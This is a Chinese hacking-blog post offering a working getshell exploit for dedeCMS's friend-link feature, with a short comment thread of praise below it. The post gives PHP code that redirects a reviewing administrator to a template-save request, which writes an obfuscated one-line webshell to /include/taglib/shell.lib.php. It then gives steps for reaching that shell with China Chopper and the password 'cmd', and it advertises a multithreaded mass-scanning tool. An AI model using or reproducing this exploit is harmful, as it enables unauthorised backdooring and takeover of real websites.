dedeCMS友情链接getshell漏洞利用工具(附exp)

  • 内容
  • 相关

不多说一类多说的吧直接上exp


<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径
//拼接 exp
$muma = '<'.'?'.'p'.'h'.'p'.' '.'p'.'h'.'p'.'i'.'n'.'f'.'o'.'('.')'.';'.'?'.'>'.'<'.'?'.'p'.'h'.'p'.' '.'e'.'x'.'t'.'r'.'a'.'c'.'t'.'('.'$'.'_'.'G'.'E'.'T'.')'.'.'.'$'.'a'.'('.'$'.'b'.'['.'0'.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>
使用

代码存为PHP文件,上传到你的空间。去提前友连申请,网址填写你上传后的地址。

站长审核后台友情连接时会生成一句话地址为/include/taglib/shell.lib.php

御剑字典添加/include/taglib/shell.lib.php测试是否存活即可

最后菜刀访问传参一句话http://site.com/include/taglib/shell.lib.php?a=assert&b[0]=@eval($_POST[cmd]);

密码为cmd


当然也有大牛研究出来了工具

2017-07-13

使用说明

1、左侧右键导入网址
2、中间右键点击配置可打开右侧功能区
3、修改key.ini文件里面的www.xxx.com/dede.php 替换成自己的即可
4、扫描完毕之后点击开始获取即可获取验证码,点击手工插入即可进行插入功能,下次会自动获取验证码,直接输入
验证码,进行手工插入即可。
4、多线程批量扫描,可自定义线程,可以导入大量url工作。

管理员设置回复可下载

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:dedeCMS友情链接getshell漏洞利用工具(附exp) - https://www.0dayhack.com/post-389.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

588条评论
  1. avatar

    xiaocheng Lv.1 QQbrowser QQbrowser Android 9 Android 9 回复

    现在还能用么

    山东省济宁市 移动

    1. avatar

      admiadm Lv.2 Chrome 71.0.3578.98 Chrome 71.0.3578.98 Windows 7 Windows 7 回复

      大神出品必属精品

      山东省 电信

      1. avatar

        laoyou Lv.1 Internet Explorer 11.0 Internet Explorer 11.0 Windows 7 x64 Edition Windows 7 x64 Edition 回复

        大神出品必属精品

        山东省 电信

        1. avatar

          majiajun Lv.2 Chrome 63.0.3239.26 Chrome 63.0.3239.26 Windows Windows 回复

          xiexieasdf

          山东省 电信

          1. avatar

            majiajun Lv.2 Chrome 63.0.3239.26 Chrome 63.0.3239.26 Windows Windows 回复

            15315

            山东省 电信

            1. avatar

              majiajun Lv.2 Chrome 63.0.3239.26 Chrome 63.0.3239.26 Windows Windows 回复

              厉害了我的哥

              山东省 电信

              1. avatar

                majiajun Lv.2 Chrome 63.0.3239.26 Chrome 63.0.3239.26 Windows Windows 回复

                jklgkjgkj

                山东省 电信

                1. avatar

                  xsstf Lv.1 Firefox 65.0 Firefox 65.0 Windows Windows 回复

                  大佬牛逼666

                  山东省 电信

                  1. avatar

                    xsstf Lv.1 Firefox 65.0 Firefox 65.0 Windows Windows 回复

                    牛逼

                    山东省 电信

                    1. avatar

                      xsstf Lv.1 Firefox 65.0 Firefox 65.0 Windows Windows 回复

                      666666666666666666

                      山东省 电信